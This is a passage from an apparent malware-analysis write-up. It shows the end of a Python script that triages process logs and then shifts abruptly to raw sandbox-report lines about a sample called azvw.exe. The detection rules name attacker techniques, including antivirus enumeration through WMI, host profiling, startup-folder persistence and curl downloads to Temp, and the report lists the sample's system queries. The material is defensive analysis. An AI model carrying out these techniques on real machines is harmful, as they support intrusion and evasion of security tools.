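        "jspo": qs.get("jspo", [None])[0],  # assumed stage/command selector
        "payload_name": decode_xvgj(xvgj) if xvgj else None,
    }


def classify(rec):
    """Map one record to the behaviours it evidences (names are this example's own)."""
    cl = rec["cmdline"].lower()
    image = rec["image"].lower()
    flags = set()
    if image.endswith("wmic.exe") and "securitycenter2" in cl and "antivirusproduct" in cl:
        flags.add("av_enumeration")
    if image.endswith("systeminfo.exe"):
        flags.add("host_profiling")
    if "[internetshortcut]" in cl and r"\start menu\programs\startup" in cl:
        flags.add("startup_url_persistence")
    if image.endswith("curl.exe") and r"\appdata\local\temp" in cl:
        flags.add("download_to_temp")
    return flags


def triage(log_text):
    """Run every record through the parsers; return downloads, behaviour flags and C2 hosts."""
    downloads, flags = [], set()
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        flags |= classify(rec)
        dl = extract_download(rec["cmdline"])
        if dl:
            downloads.append(dl)
    hosts = sorted({d["host"] for d in downloads})
    return {"downloads": downloads, "flags": sorted(flags), "hosts": hosts}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for d in result["downloads"]:
        print(f'{d["host"]}{d["path"]} jspo={d["jspo"]} payload={d["payload_name"]} -> {d["dest"]}')
    print("behaviours:", ", ".join(result["flags"]))
    print("block:", ", ".join(result["hosts"]))
```

Run as a script it prints the decoded download chain and the two hosts to block; to use it on live telemetry, reshape Sysmon Event ID 1 or EDR process-creation events into the same "Source: ... Process created: ..." form before handing them to triage().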
Source: Finish.com, 0000000A.00000003.2078982838.0000000003A70000.00000004.00000800.00020000.00000000.sdmp, Finish.com, 0000000A.00000000.2072228997.0000000000613000.00000002.00000001.01000000.00000007.sdmp, InnoSphere.scr, 00000010.00000000.2231027932.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_0041713F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA, 52_2_00416AF5
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte, 52_2_0041BC50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: EnumSystemLocalesA, 52_2_00417068
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: EnumSystemLocalesA, 52_2_00416CCA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_00411CF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_0041709F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_00411CB0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 52_2_00416D51
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 52_2_0041BD13
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_004171C4
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_0041725C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: EnumSystemLocalesA, 52_2_00416F55
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 52_2_0041BB3D
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 52_2_0041BBFA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_00416FAB
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00413F9E GetLocalTime,GetSystemTime,GetTimeZoneInformation, 52_2_00413F9E
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004194BD GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 52_2_004194BD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Legend of the contacted-IP distribution chart (chart image not reproduced): No. of IPs < 25%; 25% to 50%; 50% to 75%; 75% and above.